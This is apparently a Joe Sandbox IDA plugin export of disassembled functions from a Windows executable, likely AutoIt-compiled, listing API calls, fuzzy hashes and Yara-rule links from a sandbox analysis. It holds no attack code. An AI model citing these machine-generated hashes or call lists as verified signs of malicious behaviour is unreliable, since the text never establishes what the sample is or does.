Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: _wcslen$LocalTime
String ID:
API String ID: 952045576-0
Opcode ID: 374e45c2ede5f48277fa5513aac3a517a23a8a33dfd6ae53a2db0396b6dcbae7
Instruction ID: d27baaf659fcf280150b40660b486edef22881bc1c04af6a2d0cfec3c3412e67
Opcode Fuzzy Hash: 374e45c2ede5f48277fa5513aac3a517a23a8a33dfd6ae53a2db0396b6dcbae7
Instruction Fuzzy Hash: 80419666C10118B5EB21EBF4888EACF77A8AF49710F508462F518E3123FB3CE655C3A5

Function 0072F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON

Download Yara Rule

APIs

ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0076682C,00000004,00000000,00000000), ref: 0072F953
ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,0076682C,00000004,00000000,00000000), ref: 0076F3D1
ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,0076682C,00000004,00000000,00000000), ref: 0076F454

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: ShowWindow
String ID:
API String ID: 1268545403-0
Opcode ID: 0181240a7d32f1a239a6565589521c509766db7eb923d938e15fa7cedbe97c8f
Instruction ID: aaa872d5f42dd3b604d00f0b5aafbc98e9c0a6addc0113da47d67118295efcad
Opcode Fuzzy Hash: 0181240a7d32f1a239a6565589521c509766db7eb923d938e15fa7cedbe97c8f
Instruction Fuzzy Hash: AE410A31608690BEC7399B2DF88872A7BB5AB96314F54843DE4C7D6661DA3DB8C0CB11

Function 007A2D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 007A2D1B
GetDC.USER32(00000000), ref: 007A2D23
GetDeviceCaps.GDI32(00000000,0000005A), ref: 007A2D2E
ReleaseDC.USER32(00000000,00000000), ref: 007A2D3A
CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 007A2D76
SendMessageW.USER32(?,00000030,00000000,00000001), ref: 007A2D87
MoveWindow.USER32(?,?,?,?,?,00000000,?,?,007A5A65,?,?,000000FF,00000000,?,000000FF,?), ref: 007A2DC2
SendMessageW.USER32(?,00000142,00000000,00000000), ref: 007A2DE1

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
String ID:
API String ID: 3864802216-0
Opcode ID: 6ba767d388ac09378804cf26e1d44bdc63c3a23a752d26f7c916e672b321e3ed
Instruction ID: 7d7bd8a1d2d54d25b90b6c3c2c37ea6c3335fd060f2ce4f3bc0291cfc67eaf5c
Opcode Fuzzy Hash: 6ba767d388ac09378804cf26e1d44bdc63c3a23a752d26f7c916e672b321e3ed
Instruction Fuzzy Hash: 9A318072201214BFEB158F54CC89FEB3FADEF8A715F048155FE089A292C6799C51C7A4

Function 00775622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON

Download Yara Rule

APIs

_memcmp.LIBVCRUNTIME ref: 00775637
_memcmp.LIBVCRUNTIME ref: 00775659
_memcmp.LIBVCRUNTIME ref: 00775671
_memcmp.LIBVCRUNTIME ref: 00775684
_memcmp.LIBVCRUNTIME ref: 0077569E
_memcmp.LIBVCRUNTIME ref: 007756B1
_memcmp.LIBVCRUNTIME ref: 007756C9
_memcmp.LIBVCRUNTIME ref: 007756E4

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: _memcmp
String ID:
API String ID: 2931989736-0
Opcode ID: 1f48fc5ac123f200f7c0f433b8038486604562e021d690073858156da749252e
Instruction ID: 9f5cdf6266d20c1969ab24c6d755083bde103c94d6bdaed90506daffad9363ad
Opcode Fuzzy Hash: 1f48fc5ac123f200f7c0f433b8038486604562e021d690073858156da749252e
Instruction Fuzzy Hash: 6821FCA1740A09B7EA1857218D82FFA335CAF517D4F848120FD0CDA542F7ADEE1082F5

Function 00794FAE Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 359COMMON

Download Yara Rule

Strings

NULL Pointer assignment, xrefs: 0079502E, 00795383
Not an Object type, xrefs: 00795007

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID:
String ID: NULL Pointer assignment$Not an Object type
API String ID: 0-572801152
Opcode ID: e3121fa54ff457386abcacb03c317adf40e0a491a9ec5eb38a005e2353d053be
Instruction ID: 091218591e2498ce87cb8a9748c28ffec8dca6af14bfd5fd8502ea3b2c01d1c4
Opcode Fuzzy Hash: e3121fa54ff457386abcacb03c317adf40e0a491a9ec5eb38a005e2353d053be
Instruction Fuzzy Hash: 35D1E471A0061AAFDF11CFA8E885BAEB7B5FF48344F148169E915AB281E374DD41CB90

Function 00751522 Relevance: 10.8, APIs: 7, Instructions: 268COMMON

Download Yara Rule

APIs

GetCPInfo.KERNEL32(00000000,00000000,?,7FFFFFFF,?,?,007517FB,00000000,00000000,?,00000000,?,?,?,?,00000000), ref: 007515CE
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,007517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00751651
MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,007517FB,?,007517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 007516E4
MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,007517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 007516FB

Part of subcall function 00743820: RtlAllocateHeap.NTDLL(00000000,?,007E1444,?,0072FDF5,?,?,0071A976,00000010,007E1440,007113FC,?,007113C6,?,00711129), ref: 00743852

MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,007517FB,00000000,00000000,?,00000000,?,?,?,?), ref: 00751777
__freea.LIBCMT ref: 007517A2
__freea.LIBCMT ref: 007517AE

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: ByteCharMultiWide$__freea$AllocateHeapInfo
String ID:
API String ID: 2829977744-0
Opcode ID: 7f04e7bfc9461c7b176e496d607b810a75c5d89ebd97454612885a6fdc0bd8c3
Instruction ID: e3bcdbfa30defbe245a3376009d1589fad420cbb2a65c49ef194ce2465f74dd1
Opcode Fuzzy Hash: 7f04e7bfc9461c7b176e496d607b810a75c5d89ebd97454612885a6fdc0bd8c3
Instruction Fuzzy Hash: 6B91D571E002169ADB208E78C885BEE7BB5DF49313F984659EC01E7141EBBDCD48C760

Function 00794523 Relevance: 10.8, APIs: 4, Strings: 2, Instructions: 262COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 00794648
VariantInit.OLEAUT32(?), ref: 00794749
VariantClear.OLEAUT32(?), ref: 00794753
VariantClear.OLEAUT32(?), ref: 007947B0

Strings

Null Object assignment in FOR..IN loop, xrefs: 007945D8, 00794706, 007947BE
Incorrect Object type in FOR..IN loop, xrefs: 0079472C

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Variant$ClearInit
String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
API String ID: 2610073882-625585964
Opcode ID: bbed661c169e8396d1582b6d0ffba5c911603569240083370332315b2fff532d
Instruction ID: 57da5829f894b22822e49af9a33af9ff3f90da0972e4413065a4073307675847
Opcode Fuzzy Hash: bbed661c169e8396d1582b6d0ffba5c911603569240083370332315b2fff532d
Instruction Fuzzy Hash: 12919471A00219EBDF24CFA4DC48FAE7BB8EF46714F108559F505AB280D7789942CFA0

Function 00781187 Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

APIs

SafeArrayGetVartype.OLEAUT32(00000001,?), ref: 0078125C
SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00781284
SafeArrayUnaccessData.OLEAUT32(00000001), ref: 007812A8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 007812D8
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 0078135F
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 007813C4
SafeArrayAccessData.OLEAUT32(00000001,?), ref: 00781430

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: ArraySafe$Data$Access$UnaccessVartype
String ID:
API String ID: 2550207440-0
Opcode ID: 68761571e62faa0e929e591d00ff3d2b1fcd906f192097b1c3b72246cebb4f22
Instruction ID: c58f0240b76f4c088f7d9e479dd4be0860ab5a4fb8985a9a9b5c25ed038da7d4
Opcode Fuzzy Hash: 68761571e62faa0e929e591d00ff3d2b1fcd906f192097b1c3b72246cebb4f22
Instruction Fuzzy Hash: 5591D471A40218EFDB01EF98C888BBE77B9FF45325F504029E905E7291D77CA946CB94

Function 0072948A Relevance: 10.8, APIs: 7, Instructions: 254COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 5e263921f4defef66cafa9e19f203cefb1f42a99350fcf2e3ffa308719413d2b
Instruction ID: 1db8bfb72d5145652abec93baf0134b1f96d1a98a68990e29a41a9bfac568acd
Opcode Fuzzy Hash: 5e263921f4defef66cafa9e19f203cefb1f42a99350fcf2e3ffa308719413d2b
Instruction Fuzzy Hash: 75915C71E00219EFCB15CFA9DC84AEEBBB8FF49320F148055E915B7291D378A951CB60

Function 00793947 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 240COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(?), ref: 0079396B
CharUpperBuffW.USER32(?,?), ref: 00793A7A
_wcslen.LIBCMT ref: 00793A8A
VariantClear.OLEAUT32(?), ref: 00793C1F

Part of subcall function 00780CDF: VariantInit.OLEAUT32(00000000), ref: 00780D1F
Part of subcall function 00780CDF: VariantCopy.OLEAUT32(?,?), ref: 00780D28
Part of subcall function 00780CDF: VariantClear.OLEAUT32(?), ref: 00780D34

Strings

Incorrect Parameter format, xrefs: 007939A6, 00793BA1
AUTOIT.ERROR, xrefs: 00793A80, 00793A85

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Variant$ClearInit$BuffCharCopyUpper_wcslen
String ID: AUTOIT.ERROR$Incorrect Parameter format
API String ID: 4137639002-1221869570
Opcode ID: 2258d3928beb7d6350e2563c79eebb989b527776ed82de6830bd701f53d7f29f
Instruction ID: 486d14978b32bb3dc3e34b91c8cb593a2fd92ca05da94d29e879775daeea1db3
Opcode Fuzzy Hash: 2258d3928beb7d6350e2563c79eebb989b527776ed82de6830bd701f53d7f29f
Instruction Fuzzy Hash: 249144756083059FCB04EF28D48596AB7E5FF89314F14882DF8899B351DB38EE45CB92

Function 00794BAD Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

APIs

Part of subcall function 0077000E: CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,0076FF41,80070057,?,?,?,0077035E), ref: 0077002B
Part of subcall function 0077000E: ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0076FF41,80070057,?,?), ref: 00770046
Part of subcall function 0077000E: lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0076FF41,80070057,?,?), ref: 00770054
Part of subcall function 0077000E: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,0076FF41,80070057,?), ref: 00770064

CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,00000001,?,?), ref: 00794C51
_wcslen.LIBCMT ref: 00794D59
CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,?), ref: 00794DCF
CoTaskMemFree.OLE32(?), ref: 00794DDA

Strings

NULL Pointer assignment, xrefs: 00794E23, 00794E52

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: FreeFromProgTask$CreateInitializeInstanceSecurity_wcslenlstrcmpi
String ID: NULL Pointer assignment
API String ID: 614568839-2785691316
Opcode ID: c4465fa0171a2ca5f26711f2dd830170346cf0ee0ebbecacebba3ac32d36c97f
Instruction ID: a826c8bec5a95e51e26e92f8b7ef1400dbebae25387448eafb4f7f08564c63f1
Opcode Fuzzy Hash: c4465fa0171a2ca5f26711f2dd830170346cf0ee0ebbecacebba3ac32d36c97f
Instruction Fuzzy Hash: 7F911771D00219EFDF15DFA4D895EEEB7B8BF08310F108169E919A7291DB389A45CFA0

Function 007A20FD Relevance: 10.7, APIs: 7, Instructions: 196windowCOMMON

Download Yara Rule

APIs

GetMenu.USER32(?), ref: 007A2183
GetMenuItemCount.USER32(00000000), ref: 007A21B5
GetMenuStringW.USER32(00000000,00000000,?,00007FFF,00000400), ref: 007A21DD
_wcslen.LIBCMT ref: 007A2213
GetMenuItemID.USER32(?,?), ref: 007A224D
GetSubMenu.USER32(?,?), ref: 007A225B

Part of subcall function 00773A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00773A57
Part of subcall function 00773A3D: GetCurrentThreadId.KERNEL32 ref: 00773A5E
Part of subcall function 00773A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,007725B3), ref: 00773A65

PostMessageW.USER32(?,00000111,00000000,00000000), ref: 007A22E3

Part of subcall function 0077E97B: Sleep.KERNEL32 ref: 0077E9F3

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Menu$Thread$Item$AttachCountCurrentInputMessagePostProcessSleepStringWindow_wcslen
String ID:
API String ID: 4196846111-0
Opcode ID: a84bd8c0bb814eb812a0013fa517fbfa7aa05676edeae69c82255f4f62a3752d
Instruction ID: 5f496f74baad75f0e164df5f4c66a4e0a5cd03224669a34c737b03a01ffbc9f8
Opcode Fuzzy Hash: a84bd8c0bb814eb812a0013fa517fbfa7aa05676edeae69c82255f4f62a3752d
Instruction Fuzzy Hash: C1718135A00205EFCB15DF68C845AAEB7F5FF89310F158559E816EB392DB38ED428B90

Function 0077AEBA Relevance: 10.7, APIs: 7, Instructions: 162windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(?), ref: 0077AEF9
GetKeyboardState.USER32(?), ref: 0077AF0E
SetKeyboardState.USER32(?), ref: 0077AF6F
PostMessageW.USER32(?,00000101,00000010,?), ref: 0077AF9D
PostMessageW.USER32(?,00000101,00000011,?), ref: 0077AFBC
PostMessageW.USER32(?,00000101,00000012,?), ref: 0077AFFD
PostMessageW.USER32(?,00000101,0000005B,?), ref: 0077B020

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 222692f3ca71d8dbf98498b7378c586ef855c07494137cda8107be305461aac1
Instruction ID: f839fcb0f75cd0a06b3deb4fdb94dbffd986f4999fd90ed1407a26f67d0aa1e9
Opcode Fuzzy Hash: 222692f3ca71d8dbf98498b7378c586ef855c07494137cda8107be305461aac1
Instruction Fuzzy Hash: 7F51C0A06087D53DFF3682348849BBABEA95B46384F08C589E1DD958C2C3DCE888D761

Function 0077ACDA Relevance: 10.7, APIs: 7, Instructions: 161windowCOMMON

Download Yara Rule

APIs

GetParent.USER32(00000000), ref: 0077AD19
GetKeyboardState.USER32(?), ref: 0077AD2E
SetKeyboardState.USER32(?), ref: 0077AD8F
PostMessageW.USER32(00000000,00000100,00000010,?), ref: 0077ADBB
PostMessageW.USER32(00000000,00000100,00000011,?), ref: 0077ADD8
PostMessageW.USER32(00000000,00000100,00000012,?), ref: 0077AE17
PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 0077AE38

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: MessagePost$KeyboardState$Parent
String ID:
API String ID: 87235514-0
Opcode ID: 0772cbb387c9055a35cae5a5b89b6487cdac92207deeaee35665a6b35020ef3b
Instruction ID: ea15915b231fe0a9e65c5539d6a12179a46f456cf7f5996246cb9231d428082b
Opcode Fuzzy Hash: 0772cbb387c9055a35cae5a5b89b6487cdac92207deeaee35665a6b35020ef3b
Instruction Fuzzy Hash: F051A3A16047D53DFF3783248C56BBE7EA96B86340F08C589E1DD46882D29CAC94D752

Function 0074542E Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(00753CD6,?,?,?,?,?,?,?,?,00745BA3,?,?,00753CD6,?,?), ref: 00745470
__fassign.LIBCMT ref: 007454EB
__fassign.LIBCMT ref: 00745506
WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00753CD6,00000005,00000000,00000000), ref: 0074552C
WriteFile.KERNEL32(?,00753CD6,00000000,00745BA3,00000000,?,?,?,?,?,?,?,?,?,00745BA3,?), ref: 0074554B
WriteFile.KERNEL32(?,?,00000001,00745BA3,00000000,?,?,?,?,?,?,?,?,?,00745BA3,?), ref: 00745584

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: FileWrite__fassign$ByteCharConsoleMultiWide
String ID:
API String ID: 1324828854-0
Opcode ID: bf03449d3132c7b7934d3329b0ae1782cad7f96788510cb015565ff195c46e50
Instruction ID: 10bf75a695019a5eb57b5524ba20365d7e455ab97ff693bd6fef1dce28cb63fe
Opcode Fuzzy Hash: bf03449d3132c7b7934d3329b0ae1782cad7f96788510cb015565ff195c46e50
Instruction Fuzzy Hash: 2851E670A00649AFDB11CFA8D885AEEFBFAEF09300F14411AF555E7292E7349A51CB60

Function 007910B8 Relevance: 10.6, APIs: 7, Instructions: 110networkCOMMON

Download Yara Rule

APIs

Part of subcall function 0079304E: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 0079307A
Part of subcall function 0079304E: _wcslen.LIBCMT ref: 0079309B

socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 00791112
WSAGetLastError.WSOCK32 ref: 00791121
WSAGetLastError.WSOCK32 ref: 007911C9
closesocket.WSOCK32(00000000), ref: 007911F9

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: ErrorLast$_wcslenclosesocketinet_addrsocket
String ID:
API String ID: 2675159561-0
Opcode ID: 32c704fbb015dfe37e782e4ab78e3fa7e23fd2a6ea55ab3f9be9c6800e7d89e0
Instruction ID: 443a8aaf88ddbaacbe4aaf25af00f731db032f0474a022cc33d394f72780b2cf
Opcode Fuzzy Hash: 32c704fbb015dfe37e782e4ab78e3fa7e23fd2a6ea55ab3f9be9c6800e7d89e0
Instruction Fuzzy Hash: B541F431600209FFDB119F58D888BA9BBEAFF85324F148059F9159B291D778ED81CBA1

Function 0077CF00 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0077DDE0: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,0077CF22,?), ref: 0077DDFD

Part of subcall function 0077DDE0: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,0077CF22,?), ref: 0077DE16

lstrcmpiW.KERNEL32(?,?), ref: 0077CF45
MoveFileW.KERNEL32(?,?), ref: 0077CF7F
_wcslen.LIBCMT ref: 0077D005
_wcslen.LIBCMT ref: 0077D01B
SHFileOperationW.SHELL32(?), ref: 0077D061

Strings

\*.*, xrefs: 0077CFF3

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

